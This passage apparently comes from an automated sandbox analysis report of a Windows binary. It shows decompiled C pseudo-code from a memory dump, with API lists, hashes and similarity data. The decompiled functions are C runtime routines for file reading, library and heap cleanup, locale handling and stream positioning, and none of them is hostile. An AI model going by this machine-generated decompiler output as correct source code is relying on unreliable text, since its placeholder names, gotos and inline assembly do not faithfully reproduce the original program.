                                                                                                                        											E004134DF(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                        											 *_t133 =  *_t133 + _t131;
                                                                                                                        											_v12 = _v12 + _t131;
                                                                                                                        											_t120 = _t120 - _t131;
                                                                                                                        											_t134 = _t134 + 0x10;
                                                                                                                        											_v8 = _v8 - _t131;
                                                                                                                        											_t131 = _v20;
                                                                                                                        										}
                                                                                                                        										L39:
                                                                                                                        										__eflags = _t120;
                                                                                                                        									} while (_t120 != 0);
                                                                                                                        									goto L40;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t118 = _t90 | 0xffffffff;
                                                                                                                        						_t90 = _t118 / _a12;
                                                                                                                        						_t125 = _t118 % _a12;
                                                                                                                        						__eflags = _a16 - _t90;
                                                                                                                        						if(_a16 <= _t90) {
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					L3:
                                                                                                                        					_t92 = E0040F27B(_t138);
                                                                                                                        					_push(_t131);
                                                                                                                        					_push(_t131);
                                                                                                                        					_push(_t131);
                                                                                                                        					_push(_t131);
                                                                                                                        					 *_t92 = 0x16;
                                                                                                                        					_push(_t131);
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x0040f132
                                                                                                                        0x0040f133
                                                                                                                        0x0040f134
                                                                                                                        0x0040f135
                                                                                                                        0x0040f13b
                                                                                                                        0x00000000
                                                                                                                        0x0040f04a
                                                                                                                        0x0040f053
                                                                                                                        0x0040f058
                                                                                                                        0x0040f05b
                                                                                                                        0x0040f05d
                                                                                                                        0x0040f060
                                                                                                                        0x0040f062
                                                                                                                        0x0040f065
                                                                                                                        0x0040f068
                                                                                                                        0x0040f068
                                                                                                                        0x0040f105
                                                                                                                        0x0040f105
                                                                                                                        0x0040f105
                                                                                                                        0x00000000
                                                                                                                        0x0040f023
                                                                                                                        0x0040f01d
                                                                                                                        0x0040efe8
                                                                                                                        0x0040efc9
                                                                                                                        0x0040efce
                                                                                                                        0x0040efce
                                                                                                                        0x0040efd1
                                                                                                                        0x0040efd4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040efd4
                                                                                                                        0x0040efa3
                                                                                                                        0x0040efa3
                                                                                                                        0x0040efa8
                                                                                                                        0x0040efa9
                                                                                                                        0x0040efaa
                                                                                                                        0x0040efab
                                                                                                                        0x0040efac
                                                                                                                        0x0040efb2
                                                                                                                        0x00000000
                                                                                                                        0x0040efb2

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: 8fcea1e7f3a9ff326cfc4798bd3bd9d7cc3ac604e60f7f385c27333f9bc0308d
                                                                                                                        • Instruction ID: ad7a0912f5272dc139e3a5694086b9d86efaf6731e3cc18df21e16f420f9d9b0
                                                                                                                        • Opcode Fuzzy Hash: 8fcea1e7f3a9ff326cfc4798bd3bd9d7cc3ac604e60f7f385c27333f9bc0308d
                                                                                                                        • Instruction Fuzzy Hash: 5051F730A00205EBCB309F6AC84499FB775EF80324F24863BF825B66D1D3799E55CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E004054E0(char _a4) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t12;
                                                                                                                        				void* _t13;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				struct HINSTANCE__** _t19;
                                                                                                                        				void* _t21;
                                                                                                                        				signed int _t26;
                                                                                                                        				void* _t28;
                                                                                                                        
                                                                                                                        				_t1 =  &_a4; // 0x405643
                                                                                                                        				_t28 =  *_t1;
                                                                                                                        				if(_t28 != 0) {
                                                                                                                        					if( *((intOrPtr*)(_t28 + 8)) == 0) {
                                                                                                                        						L9:
                                                                                                                        						_t13 =  *(_t28 + 4);
                                                                                                                        						if(_t13 != 0) {
                                                                                                                        							VirtualFree(_t13, 0, 0x8000);
                                                                                                                        						}
                                                                                                                        						return HeapFree(GetProcessHeap(), 0, _t28);
                                                                                                                        					}
                                                                                                                        					_t26 = 0;
                                                                                                                        					if( *((intOrPtr*)(_t28 + 0xc)) <= 0) {
                                                                                                                        						L8:
                                                                                                                        						_push( *((intOrPtr*)(_t28 + 8)));
                                                                                                                        						E0040E815(_t21, _t26, _t28, _t35);
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					_push(_t21);
                                                                                                                        					do {
                                                                                                                        						_t18 =  *((intOrPtr*)(_t28 + 8));
                                                                                                                        						_t19 = _t18 + _t26 * 4;
                                                                                                                        						if( *(_t18 + _t26 * 4) != 0xffffffff) {
                                                                                                                        							FreeLibrary( *_t19);
                                                                                                                        						}
                                                                                                                        						_t26 = _t26 + 1;
                                                                                                                        						_t35 = _t26 -  *((intOrPtr*)(_t28 + 0xc));
                                                                                                                        					} while (_t26 <  *((intOrPtr*)(_t28 + 0xc)));
                                                                                                                        					_pop(_t21);
                                                                                                                        					goto L8;
                                                                                                                        				}
                                                                                                                        				return _t12;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,89FFFFFF,00000000,00405643,00000000,?,?,?,?,?,00401DAE,?), ref: 0040550F
                                                                                                                        • VirtualFree.KERNEL32(0041B2F4,00000000,00008000,00000000,00405643,00000000,?,?,?,?,?,00401DAE,?), ref: 00405534
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,CV@,00000000,00405643,00000000,?,?,?,?,?,00401DAE,?), ref: 0040553D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00401DAE,?), ref: 00405544
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$LibraryProcessVirtual
                                                                                                                        • String ID: CV@
                                                                                                                        • API String ID: 548792435-396382665
                                                                                                                        • Opcode ID: f6ef0cc57f74e93fefc7cbf5eaeb52e8174d16e89876a307992af9e1ee6c7b40
                                                                                                                        • Instruction ID: ec93b9244a2cdd63e360098806736050d25e692456fe2dd0a92e9b7555eb6b6a
                                                                                                                        • Opcode Fuzzy Hash: f6ef0cc57f74e93fefc7cbf5eaeb52e8174d16e89876a307992af9e1ee6c7b40
                                                                                                                        • Instruction Fuzzy Hash: 16018F71100A11EBC2209B26EC44F57B7AAFB88721F04853AA4A9A72E0D734F841CF68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00416BCA(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                        				signed int _t13;
                                                                                                                        				intOrPtr _t28;
                                                                                                                        				void* _t29;
                                                                                                                        				void* _t30;
                                                                                                                        
                                                                                                                        				_t30 = __eflags;
                                                                                                                        				_t26 = __edi;
                                                                                                                        				_t25 = __edx;
                                                                                                                        				_t22 = __ebx;
                                                                                                                        				_push(0xc);
                                                                                                                        				_push(0x421428);
                                                                                                                        				E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t28 = E00413823(__ebx, __edx, __edi, _t30);
                                                                                                                        				_t13 =  *0x422e1c; // 0xfffffffe
                                                                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                        					L6:
                                                                                                                        					E00410274(_t22, 0xc);
                                                                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                        					_t26 =  *0x422f00; // 0x422e28
                                                                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E00416B8C(_t8, _t26);
                                                                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                        					E00416C34();
                                                                                                                        				} else {
                                                                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                        						goto L6;
                                                                                                                        					} else {
                                                                                                                        						_t28 =  *((intOrPtr*)(E00413823(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				if(_t28 == 0) {
                                                                                                                        					E00410FBC(_t25, _t26, 0x20);
                                                                                                                        				}
                                                                                                                        				return E00410DB1(_t28);
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00416BD6
                                                                                                                          • Part of subcall function 00413823: __getptd_noexit.LIBCMT ref: 00413826
                                                                                                                          • Part of subcall function 00413823: __amsg_exit.LIBCMT ref: 00413833
                                                                                                                        • __getptd.LIBCMT ref: 00416BED
                                                                                                                        • __amsg_exit.LIBCMT ref: 00416BFB
                                                                                                                        • __lock.LIBCMT ref: 00416C0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                        • String ID: (.B
                                                                                                                        • API String ID: 3521780317-1523247066
                                                                                                                        • Opcode ID: 9d591d5953f3a523f590c7904c2148318a916f87547ffaa3ac7edef2b92f3cf5
                                                                                                                        • Instruction ID: 69efc4498844c93df44f94e7f113891e5f276df7bac8a7875185d6db0fda695a
                                                                                                                        • Opcode Fuzzy Hash: 9d591d5953f3a523f590c7904c2148318a916f87547ffaa3ac7edef2b92f3cf5
                                                                                                                        • Instruction Fuzzy Hash: 3FF06D32E043149AD720FBBA95027CA73A0AB00724F52515FA44197291DBFCE9C1DA9E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E00402E40(void* __eax, short** __ecx, void* __edx, short* _a4, int _a8) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t13;
                                                                                                                        				void* _t22;
                                                                                                                        				int _t26;
                                                                                                                        				int _t29;
                                                                                                                        				void* _t32;
                                                                                                                        				int _t34;
                                                                                                                        				short* _t37;
                                                                                                                        
                                                                                                                        				_t22 = __edx;
                                                                                                                        				_t37 = _a4;
                                                                                                                        				_t18 = __ecx;
                                                                                                                        				if(_t37 != 0) {
                                                                                                                        					_t26 = lstrlenW(_t37) + 1;
                                                                                                                        					_t29 = _t26 * 4;
                                                                                                                        					E00402CE0(_t18, _t22, _t37, _t18, _t29,  &(_t18[1]), 0x80);
                                                                                                                        					_t13 = WideCharToMultiByte(_a8, 0, _t37, _t26,  *_t18, _t29, 0, 0);
                                                                                                                        					asm("sbb esi, esi");
                                                                                                                        					_t32 =  ~_t13 + 1;
                                                                                                                        					if(_t32 != 0) {
                                                                                                                        						_t13 = GetLastError();
                                                                                                                        						if(_t13 == 0x7a) {
                                                                                                                        							_t34 = WideCharToMultiByte(_a8, 0, _t37, _t26, 0, 0, 0, 0);
                                                                                                                        							E00402CE0(_t18, _a8, _t37, _t18, _t34,  &(_t18[1]), 0x80);
                                                                                                                        							_t13 = WideCharToMultiByte(_a8, 0, _t37, _t26,  *_t18, _t34, 0, 0);
                                                                                                                        							asm("sbb esi, esi");
                                                                                                                        							_t32 =  ~_t13 + 1;
                                                                                                                        						}
                                                                                                                        						if(_t32 != 0) {
                                                                                                                        							_t13 = E00401030();
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					return _t13;
                                                                                                                        				} else {
                                                                                                                        					 *__ecx = _t37;
                                                                                                                        					return __eax;
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00402F36,004023A6,00000003,?,004023A6,00F3F310), ref: 00402E56
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000,00000003,?,004023A6,00F3F310), ref: 00402E8A
                                                                                                                        • GetLastError.KERNEL32(?,004023A6,00F3F310), ref: 00402E9B
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,004023A6,00F3F310), ref: 00402EB7
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004023A6,00F3F310), ref: 00402EE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: c844c13618a281a68b591457a1185848e5b6b94b94c9d7a05cf61d7e1d15c382
                                                                                                                        • Instruction ID: bd7f2c9ded8c83ebaacfdbd5f2f1da4c36d20fae7a6fb5bea2b72b8987dcf7d0
                                                                                                                        • Opcode Fuzzy Hash: c844c13618a281a68b591457a1185848e5b6b94b94c9d7a05cf61d7e1d15c382
                                                                                                                        • Instruction Fuzzy Hash: 7E21B1316403247BE2309B15CC89F677F6CEB8AB94F148565FA45BA2C1DAB5A804C6F8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E0040F9FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				void* _t16;
                                                                                                                        				void* _t17;
                                                                                                                        				intOrPtr _t19;
                                                                                                                        				void* _t21;
                                                                                                                        				signed int _t22;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        				intOrPtr _t39;
                                                                                                                        				intOrPtr _t40;
                                                                                                                        				intOrPtr _t50;
                                                                                                                        
                                                                                                                        				_t37 = __edx;
                                                                                                                        				_push(8);
                                                                                                                        				_push(0x421098);
                                                                                                                        				E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t39 = _a4;
                                                                                                                        				_t50 = _t39;
                                                                                                                        				_t51 = _t50 != 0;
                                                                                                                        				if(_t50 != 0) {
                                                                                                                        					E00412272(_t39);
                                                                                                                        					_v8 = 0;
                                                                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                        					_t16 = E00412CC3(__edx, _t39, _t39);
                                                                                                                        					__eflags = _t16 - 0xffffffff;
                                                                                                                        					if(_t16 == 0xffffffff) {
                                                                                                                        						L6:
                                                                                                                        						_t17 = 0x4227c0;
                                                                                                                        					} else {
                                                                                                                        						_t21 = E00412CC3(__edx, _t39, _t39);
                                                                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                                                                        						if(_t21 == 0xfffffffe) {
                                                                                                                        							goto L6;
                                                                                                                        						} else {
                                                                                                                        							_t22 = E00412CC3(__edx, _t39, _t39);
                                                                                                                        							_t17 = ((E00412CC3(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x4242a0 + (_t22 >> 5) * 4));
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                        					_v8 = 0xfffffffe;
                                                                                                                        					E0040F9F5(_t39);
                                                                                                                        					_t19 = 0;
                                                                                                                        					__eflags = 0;
                                                                                                                        				} else {
                                                                                                                        					_t27 = E0040F27B(_t51);
                                                                                                                        					_t40 = 0x16;
                                                                                                                        					 *_t27 = _t40;
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					E00411AE6(__edx, _t40, 0);
                                                                                                                        					_t19 = _t40;
                                                                                                                        				}
                                                                                                                        				return E00410DB1(_t19);
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • __lock_file.LIBCMT ref: 0040F988
                                                                                                                        • __fileno.LIBCMT ref: 0040F996
                                                                                                                        • __fileno.LIBCMT ref: 0040F9A2
                                                                                                                        • __fileno.LIBCMT ref: 0040F9AE
                                                                                                                        • __fileno.LIBCMT ref: 0040F9BE
                                                                                                                          • Part of subcall function 0040F27B: __getptd_noexit.LIBCMT ref: 0040F27B
                                                                                                                          • Part of subcall function 00411AE6: __decode_pointer.LIBCMT ref: 00411AF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2805327698-0
                                                                                                                        • Opcode ID: 8b6f667f0a6f572525547dc85a85809ff395df80ef213ddde0a434db3fffa174
                                                                                                                        • Instruction ID: 9d6962b9405be4d8b5adfd2842ec6abd50ea0026cb67b6ef41238cdbd98929b0
                                                                                                                        • Opcode Fuzzy Hash: 8b6f667f0a6f572525547dc85a85809ff395df80ef213ddde0a434db3fffa174
                                                                                                                        • Instruction Fuzzy Hash: 7D018873104A1066C23177792C42AAE76908EC2B34365437FF030EB6D2EA7C969292ED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E0041645E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                        				signed int _t15;
                                                                                                                        				LONG* _t21;
                                                                                                                        				long _t23;
                                                                                                                        				void* _t31;
                                                                                                                        				LONG* _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t35;
                                                                                                                        
                                                                                                                        				_t35 = __eflags;
                                                                                                                        				_t29 = __edx;
                                                                                                                        				_t25 = __ebx;
                                                                                                                        				_push(0xc);
                                                                                                                        				_push(0x4213e8);
                                                                                                                        				E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t31 = E00413823(__ebx, __edx, __edi, _t35);
                                                                                                                        				_t15 =  *0x422e1c; // 0xfffffffe
                                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                        					E00410274(_t25, 0xd);
                                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                                        					__eflags = _t33 -  *0x422d20; // 0x12f1620
                                                                                                                        					if(__eflags != 0) {
                                                                                                                        						__eflags = _t33;
                                                                                                                        						if(_t33 != 0) {
                                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                                        							__eflags = _t23;
                                                                                                                        							if(_t23 == 0) {
                                                                                                                        								__eflags = _t33 - 0x4228f8;
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									_push(_t33);
                                                                                                                        									E0040E815(_t25, _t31, _t33, __eflags);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t21 =  *0x422d20; // 0x12f1620
                                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                                        						_t33 =  *0x422d20; // 0x12f1620
                                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                                        						InterlockedIncrement(_t33);
                                                                                                                        					}
                                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                        					E004164F9();
                                                                                                                        				} else {
                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                        				}
                                                                                                                        				if(_t33 == 0) {
                                                                                                                        					E00410FBC(_t29, _t31, 0x20);
                                                                                                                        				}
                                                                                                                        				return E00410DB1(_t33);
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 0041646A
                                                                                                                          • Part of subcall function 00413823: __getptd_noexit.LIBCMT ref: 00413826
                                                                                                                          • Part of subcall function 00413823: __amsg_exit.LIBCMT ref: 00413833
                                                                                                                        • __amsg_exit.LIBCMT ref: 0041648A
                                                                                                                        • __lock.LIBCMT ref: 0041649A
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004164B7
                                                                                                                        • InterlockedIncrement.KERNEL32(012F1620), ref: 004164E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4271482742-0
                                                                                                                        • Opcode ID: e83d88abb193b01d5e468014b9b481e8098adb43f9d5a20488817c2793bd651c
                                                                                                                        • Instruction ID: d42327c9dad0fc5dfc2df0c0c0ca09713bf0954cfd5630f56dd182ed649c3a23
                                                                                                                        • Opcode Fuzzy Hash: e83d88abb193b01d5e468014b9b481e8098adb43f9d5a20488817c2793bd651c
                                                                                                                        • Instruction Fuzzy Hash: AE01A131E00725ABD721AF66A8057DE7760BB04B14F46416FE80063391CBBCA9C2DBDD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 41%
                                                                                                                        			E0040E815(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                        				intOrPtr* _t10;
                                                                                                                        				intOrPtr _t13;
                                                                                                                        				intOrPtr _t23;
                                                                                                                        				void* _t25;
                                                                                                                        
                                                                                                                        				_push(0xc);
                                                                                                                        				_push(0x420f00);
                                                                                                                        				_t8 = E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                        				if(_t23 == 0) {
                                                                                                                        					L9:
                                                                                                                        					return E00410DB1(_t8);
                                                                                                                        				}
                                                                                                                        				if( *0x4253e0 != 3) {
                                                                                                                        					_push(_t23);
                                                                                                                        					L7:
                                                                                                                        					_t8 = HeapFree( *0x42394c, 0, ??);
                                                                                                                        					_t31 = _t8;
                                                                                                                        					if(_t8 == 0) {
                                                                                                                        						_t10 = E0040F27B(_t31);
                                                                                                                        						 *_t10 = E0040F239(GetLastError());
                                                                                                                        					}
                                                                                                                        					goto L9;
                                                                                                                        				}
                                                                                                                        				E00410274(__ebx, 4);
                                                                                                                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                        				_t13 = E004102A7(_t23);
                                                                                                                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                        				if(_t13 != 0) {
                                                                                                                        					_push(_t23);
                                                                                                                        					_push(_t13);
                                                                                                                        					E004102D7();
                                                                                                                        				}
                                                                                                                        				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                        				_t8 = E0040E86B();
                                                                                                                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                        					goto L9;
                                                                                                                        				} else {
                                                                                                                        					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0040E833
                                                                                                                          • Part of subcall function 00410274: __mtinitlocknum.LIBCMT ref: 0041028A
                                                                                                                          • Part of subcall function 00410274: __amsg_exit.LIBCMT ref: 00410296
                                                                                                                          • Part of subcall function 00410274: EnterCriticalSection.KERNEL32(004137C6,004137C6,?,0041186F,00000004,004211B8,0000000C,00414DBE,00000001,004137D5,00000000,00000000,00000000,?,004137D5,00000001), ref: 0041029E
                                                                                                                        • ___sbh_find_block.LIBCMT ref: 0040E83E
                                                                                                                        • ___sbh_free_block.LIBCMT ref: 0040E84D
                                                                                                                        • HeapFree.KERNEL32(00000000,00000001,00420F00,0000000C,00410255,00000000,00421158,0000000C,0041028F,00000001,004137C6,?,0041186F,00000004,004211B8,0000000C), ref: 0040E87D
                                                                                                                        • GetLastError.KERNEL32(?,0041186F,00000004,004211B8,0000000C,00414DBE,00000001,004137D5,00000000,00000000,00000000,?,004137D5,00000001,00000214), ref: 0040E88E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714421763-0
                                                                                                                        • Opcode ID: 97c03034d3db45eab9d729788b4d65cbd3219b7d3ec9c6bcf073ff7910037ad7
                                                                                                                        • Instruction ID: 633a2435a1d7ed1936b8ae1707e1a5504be1ccb809ebcc9e2d72e4d801c96ecc
                                                                                                                        • Opcode Fuzzy Hash: 97c03034d3db45eab9d729788b4d65cbd3219b7d3ec9c6bcf073ff7910037ad7
                                                                                                                        • Instruction Fuzzy Hash: F6017C36901311EADB307BB3A80AB9E3A60AF00768F50857FF510B71D1DBBC89918A5D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E0040FA08(void* __edx, void* __esi, char _a4) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t70;
                                                                                                                        				signed int _t71;
                                                                                                                        				intOrPtr _t73;
                                                                                                                        				signed int _t75;
                                                                                                                        				signed int _t81;
                                                                                                                        				char _t82;
                                                                                                                        				signed int _t84;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				signed int _t87;
                                                                                                                        				intOrPtr* _t90;
                                                                                                                        				signed int _t92;
                                                                                                                        				signed int _t94;
                                                                                                                        				void* _t96;
                                                                                                                        				signed char _t98;
                                                                                                                        				signed int _t99;
                                                                                                                        				intOrPtr _t102;
                                                                                                                        				signed int _t103;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				signed int _t111;
                                                                                                                        				signed int _t114;
                                                                                                                        				intOrPtr _t115;
                                                                                                                        
                                                                                                                        				_t105 = __esi;
                                                                                                                        				_t97 = __edx;
                                                                                                                        				_t104 = _a4;
                                                                                                                        				_t87 = 0;
                                                                                                                        				_t121 = _t104;
                                                                                                                        				if(_t104 != 0) {
                                                                                                                        					_t70 = E00412CC3(__edx, _t104, _t104);
                                                                                                                        					__eflags =  *(_t104 + 4);
                                                                                                                        					_v8 = _t70;
                                                                                                                        					if(__eflags < 0) {
                                                                                                                        						 *(_t104 + 4) = 0;
                                                                                                                        					}
                                                                                                                        					_push(1);
                                                                                                                        					_push(_t87);
                                                                                                                        					_push(_t70);
                                                                                                                        					_t71 = E00414A27(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                        					__eflags = _t71 - _t87;
                                                                                                                        					_v12 = _t71;
                                                                                                                        					if(_t71 < _t87) {
                                                                                                                        						L2:
                                                                                                                        						return _t71 | 0xffffffff;
                                                                                                                        					} else {
                                                                                                                        						_t98 =  *(_t104 + 0xc);
                                                                                                                        						__eflags = _t98 & 0x00000108;
                                                                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                                                                        							_t73 =  *_t104;
                                                                                                                        							_t92 =  *(_t104 + 8);
                                                                                                                        							_push(_t105);
                                                                                                                        							_v16 = _t73 - _t92;
                                                                                                                        							__eflags = _t98 & 0x00000003;
                                                                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                                                                        								__eflags = _t98;
                                                                                                                        								if(__eflags < 0) {
                                                                                                                        									L15:
                                                                                                                        									__eflags = _v12 - _t87;
                                                                                                                        									if(_v12 != _t87) {
                                                                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                        											L40:
                                                                                                                        											_t75 = _v16 + _v12;
                                                                                                                        											__eflags = _t75;
                                                                                                                        											L41:
                                                                                                                        											return _t75;
                                                                                                                        										}
                                                                                                                        										_t99 =  *(_t104 + 4);
                                                                                                                        										__eflags = _t99 - _t87;
                                                                                                                        										if(_t99 != _t87) {
                                                                                                                        											_t90 = 0x4242a0 + (_v8 >> 5) * 4;
                                                                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                        											if(__eflags == 0) {
